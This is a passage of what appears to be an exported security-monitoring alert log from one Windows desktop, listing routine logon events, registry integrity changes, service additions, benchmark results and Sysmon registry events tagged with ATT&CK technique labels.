Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:51:46.874",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: '8ef26438ac25bee10003522daa8b4a2f' +New md5sum is : '82b30eaa417a603e1be4cf6a8e7d1780' +Old sha1sum was: 'b211ed5eee8285bb054c42335a4a0a9b2c9385b0' +New sha1sum is : '06cff1d46c183923be141be79d7942caf890168a' +", +"Apr 24, 2020 @ 12:51:40.630",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. +Old md5sum was: '0ec8c5bab58c4b05da4b48fa2c3bf9b5' +New md5sum is : '0f373677e8420ba91bd16d2b118fd873' +Old sha1sum was: '453d1c5c9c77e01007afa63ba0bb33db3da2ef96' +New sha1sum is : '7cfdcf480a3cb8adf138d3f5deabf3f648b63dee' +", +"Apr 24, 2020 @ 12:51:39.202",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_3eb7b' was added. +", +"Apr 24, 2020 @ 12:51:39.186",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_3eb7b\Security' was added. +", +"Apr 24, 2020 @ 12:51:39.108",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_3eb7b' was added. +", +"Apr 24, 2020 @ 12:51:39.079",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_3eb7b\Security' was added. +", +"Apr 24, 2020 @ 12:51:38.817",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3eb7b' was added. +", +"Apr 24, 2020 @ 12:51:38.781",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3eb7b\Security' was added. +", +"Apr 24, 2020 @ 12:51:38.189",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3eb7b' was added. +", +"Apr 24, 2020 @ 12:51:38.174",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3eb7b\Security' was added. +", +"Apr 24, 2020 @ 12:51:37.968",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_3eb7b' was added. +", +"Apr 24, 2020 @ 12:51:37.954",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_3eb7b\Security' was added. +", +"Apr 24, 2020 @ 12:51:37.782",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed. +Old md5sum was: 'acae9dc748745942263a86d7eb614be0' +New md5sum is : '2e0f79c6fb4ff452e85cbf1a2d6ffc09' +Old sha1sum was: '426e630d1ce4b54eb126567e177155a4f7a507fa' +New sha1sum is : 'e00d4f56a725e171cace53875e2cb589d9ba1aaa' +", +"Apr 24, 2020 @ 12:51:36.258",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_3eb7b' was added. +", +"Apr 24, 2020 @ 12:51:36.234",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_3eb7b\Security' was added. +", +"Apr 24, 2020 @ 12:51:36.079",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_3eb7b' was added. +", +"Apr 24, 2020 @ 12:51:36.061",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_3eb7b\Security' was added. +", +"Apr 24, 2020 @ 12:51:35.999",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_3eb7b' was added. +", +"Apr 24, 2020 @ 12:51:35.983",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_3eb7b\Security' was added. +", +"Apr 24, 2020 @ 12:51:33.608",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3eb7b' was added. +", +"Apr 24, 2020 @ 12:51:33.592",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3eb7b\TriggerInfo\4' was added. +", +"Apr 24, 2020 @ 12:51:33.580",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3eb7b\TriggerInfo\3' was added. +", +"Apr 24, 2020 @ 12:51:33.562",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3eb7b\TriggerInfo\2' was added. +", +"Apr 24, 2020 @ 12:51:33.545",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3eb7b\TriggerInfo\1' was added. +", +"Apr 24, 2020 @ 12:51:33.530",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3eb7b\TriggerInfo\0' was added. +", +"Apr 24, 2020 @ 12:51:33.514",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3eb7b\Security' was added. +", +"Apr 24, 2020 @ 12:51:32.858",3,"Service startup type was changed",,"""The start type of the Windows Modules Installer service was changed from demand start to auto start.""" +"Apr 24, 2020 @ 12:51:32.545",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_3eb7b' was added. +", +"Apr 24, 2020 @ 12:51:32.530",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_3eb7b\Security' was added. +", +"Apr 24, 2020 @ 12:51:32.279",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. +Old md5sum was: 'c6ea3bd2e15bcf416c8f2d61c71010e3' +New md5sum is : '423bc04012208584e3146b2b1e60cd7b' +Old sha1sum was: '354a2b1d73f9ad4870cd65daf2b8156d72521032' +New sha1sum is : 'b945526a2a2ba5f02dc034646d066b528e36b1ee' +", +"Apr 24, 2020 @ 12:51:32.264",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '9c6c66c01d494672cf9c5daac269b542' +New md5sum is : 'dcf6db05e58a59219de5d96b8c3006e6' +Old sha1sum was: 'c813b7e7b36cfefc54b34a27f0216ea1dbc5e53c' +New sha1sum is : '93a99f033d45b00b2d9d7dffb989adb4035724bb' +", +"Apr 24, 2020 @ 12:51:32.245",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: '25da9275704be5bcd294856c17c985ff' +New md5sum is : '5bb4bbae49e24b41f43603c1087c05b4' +Old sha1sum was: 'b9157e374dc4edd20b987372a7142da352d2a9e4' +New sha1sum is : 'cfa69293c0efe2196d3d85c4711a58c4643ea77a' +", +"Apr 24, 2020 @ 12:51:29.904",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_3eb7b' was added. +", +"Apr 24, 2020 @ 12:51:29.889",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_3eb7b\Security' was added. +", +"Apr 24, 2020 @ 12:51:02.138",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T12:49:58Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 12:50:56.124",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:50:34.467",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:50:32.484",4,,"The average number of logs between 12:00 and 13:00 is 4676. We reached 11692.","""File created: +RuleName: DLL +UtcTime: 2020-04-24 12:50:24.811 +ProcessGuid: {df9fc3d3-e08f-5ea2-0000-0010cf300d00} +ProcessId: 1848 +Image: C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe +TargetFilename: C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\Qt5Qml.dll +CreationUtcTime: 2020-04-24 12:50:24.811""" +"Apr 24, 2020 @ 12:50:23.139",3,"Windows User Logoff",,"""An account was logged off. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0xC07A0 + +Logon Type: 2 + +This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.""" +"Apr 24, 2020 @ 12:50:23.113",3,"Windows User Logoff",,"""An account was logged off. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0xC07DB + +Logon Type: 2 + +This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.""" +"Apr 24, 2020 @ 12:50:23.081",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: No + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0xC07DB + Linked Logon ID: 0xC07A0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x3dc + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:50:23.056",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0xC07A0 + Linked Logon ID: 0xC07DB + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x3dc + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:50:10.389",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:50:06.700",5,"License Activation (slui.exe) failed",,"""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=TimerEvent""" +"Apr 24, 2020 @ 12:50:06.653",5,"License Activation (slui.exe) failed",,"""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=UserLogon;SessionId=1""" +"Apr 24, 2020 @ 12:50:01.465",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (66)",, +"Apr 24, 2020 @ 12:49:58.045",3,"The Windows Search Service started",,"""The Windows Search Service started. +""" +"Apr 24, 2020 @ 12:49:57.898",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:49:57.877",3,"The database engine attached a database",,"""SearchIndexer (4512,D,50) Windows: The database engine attached a database (1, C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb). (Time=0 seconds) + +Saved Cache: 0 0 +Additional Data: lgposAttach = 00000013:00BF:0268, +dbv = 1568.20.0 + +Internal Timing Sequence: +[1] 0.000005 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[2] 0.027469 -0.026611 (1) WT +J(0) +M(C:0K, Fs:25, WS:36K # 0K, PF:32K # 0K, P:32K) +[3] 0.030454 -0.024280 (6) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:3480/2) +M(C:0K, Fs:42, WS:128K # 0K, PF:148K # 0K, P:148K) +[4] 0.000124 +J(0) +[5] - +[6] - +[7] - +[8] 0.002562 -0.000716 (2) CM +J(CM:2, PgRf:2, Rd:14/2, Dy:0/0, Lg:0/0) +M(C:0K, Fs:50, WS:200K # 0K, PF:640K # 0K, P:640K) +[9] 0.215011 -0.000127 (5) CM -0.214466 (3) WT +J(CM:5, PgRf:23, Rd:0/5, Dy:0/0, Lg:0/0) +M(C:0K, Fs:67, WS:268K # 0K, PF:256K # 112K, P:256K) +[10] 0.000280 -0.000172 (1) CM +J(CM:1, PgRf:40, Rd:0/1, Dy:0/0, Lg:0/0) +M(C:0K, Fs:11, WS:44K # 0K, PF:96K # 96K, P:96K) +[11] 0.000018 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:4, WS:16K # 12K, PF:0K # 0K, P:0K) +[12] 0.000043 +J(CM:0, PgRf:42, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:3, WS:12K # 12K, PF:0K # 0K, P:0K) +[13] 0.000001 +J(0) +[14] 0.0 +J(0) +[15] 0.000005 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0).""" +"Apr 24, 2020 @ 12:49:57.732",3,"The database engine is starting a new instance",,"""SearchIndexer (4512,P,98) Windows: The database engine (10.00.18363.0000) is starting a new instance (0).""" +"Apr 24, 2020 @ 12:49:56.120",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",, +"Apr 24, 2020 @ 12:49:54.660",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.523196600Z"",""eventRecordID"":""606"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.514\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\TabletInputService\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.514"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\TabletInputService\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.514 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\TabletInputService\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:49:54.465",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.135286200Z"",""eventRecordID"":""599"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.077\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_3eb7b\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.077"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WpnUserService_3eb7b\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.077 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\WpnUserService_3eb7b\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 12:49:54.461",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.134919600Z"",""eventRecordID"":""598"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.077\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_3eb7b\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.077"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WpnUserService_3eb7b\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.077 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\WpnUserService_3eb7b\Start +Details: DWORD (0x00000002)""" +"Apr 24, 2020 @ 12:49:54.444",9,"ATT&CK T1058:Registry edit 